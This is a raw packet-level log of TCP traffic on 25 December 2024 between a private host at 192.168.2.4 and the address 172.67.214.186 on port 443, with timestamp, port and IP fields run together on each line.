                                                                                                                                          Dec 25, 2024 22:17:35.898474932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.902120113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.902136087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.902297020 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.902304888 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.902383089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.905858994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.905873060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.905941963 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.905950069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.906017065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.909784079 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.909799099 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.909872055 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.909878969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.909940958 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.913288116 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.913304090 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.913389921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.913398981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.913451910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.917427063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.917443037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.917515993 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.917525053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.917576075 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.082741976 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.082761049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.082809925 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.082823038 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.082889080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.082889080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.086919069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.086932898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.087011099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.087021112 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.087162018 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.090343952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.090359926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.090434074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.090444088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.090567112 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.094575882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.094604015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.094654083 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.094661951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.094711065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.094722033 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.098004103 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.098018885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.098156929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.098165989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.098226070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.101895094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.101910114 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.102015018 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.102024078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.102063894 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.105376005 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.105392933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.105532885 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.105540991 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.105756998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.109502077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.109524012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.109590054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.109600067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.109658957 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.275326967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.275346994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.275403976 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.275417089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.275475979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.275475979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.278788090 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.278803110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.278953075 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.278961897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.279077053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.282912970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.282932043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.283019066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.283027887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.283078909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.286396027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.286411047 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.286488056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.286495924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.286612034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.290534019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.290549040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.290627956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.290637016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.290688992 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.293761969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.293776035 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.293833971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.293843031 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.293966055 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.297976017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.297992945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.298058033 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.298067093 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.298110962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.301410913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.301425934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.301523924 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.301532984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.301615000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.467664003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.467681885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.467763901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.467777967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.467906952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.471827030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.471842051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.471911907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.471920967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.472033978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.475275040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.475290060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.475338936 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.475348949 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.475409031 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.478698015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.478713036 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.478797913 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.478806019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.478873014 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.482909918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.482927084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.482995987 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.483005047 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.483216047 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.486807108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.486821890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.486890078 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.486897945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.486911058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.486974955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.490243912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.490259886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.490330935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.490339994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.490377903 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.490416050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.494442940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.494458914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.494518995 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.494527102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.494693041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.659770012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.659816980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.659898996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.659898996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.659909010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.662647009 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.662663937 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.662729979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.662739038 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.662772894 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.666881084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.666898012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.666977882 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.666991949 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.670510054 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.670523882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.670624971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.670634985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.674597025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.674612045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.674711943 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.674721003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.678512096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.678525925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.678582907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.678591013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.678615093 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.681890965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.681905985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.681977034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.681988001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.682017088 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.686022043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.686034918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.686105967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.686125040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.740663052 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.851949930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.851967096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.852091074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.852104902 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.852205992 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.855298042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.855319023 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.855405092 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.855413914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.855695009 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.858674049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.858692884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.858752966 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.858760118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.858810902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.862956047 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.862970114 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.863090992 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.863097906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.863151073 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.866852045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.866869926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.866935968 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.866942883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.866986036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.870294094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.870311022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.870372057 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.870382071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.870450974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.874447107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.874463081 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.874541998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.874548912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.874603987 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.877926111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.877942085 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.878036022 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:36.878043890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:36.882062912 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.044258118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.044275045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.044456005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.044467926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.044631004 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.047826052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.047847986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.047914028 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.047921896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.047941923 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.047974110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.051326990 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.051342964 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.051441908 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.051454067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.051501036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.055428028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.055444002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.055515051 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.055521965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.055602074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.058887959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.058902979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.058971882 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.058979988 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.059048891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.062855959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.062870979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.062944889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.062952042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.063004971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.066246033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.066262007 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.066361904 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.066369057 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.066473961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.070565939 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.070590019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.070708036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.070715904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.070764065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.236620903 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.236648083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.236706018 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.236716986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.236773014 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.236780882 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.240308046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.240324974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.240422964 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.240428925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.240480900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.243787050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.243802071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.243863106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.243870974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.243916035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.247914076 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.247930050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.248003006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.248008966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.248094082 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.251449108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.251465082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.251549959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.251557112 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.251591921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.255281925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.255296946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.255386114 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.255393028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.255450010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.258750916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258765936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258861065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.258867979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258904934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.262877941 CET44349744172.67.214.186192.168.2.4
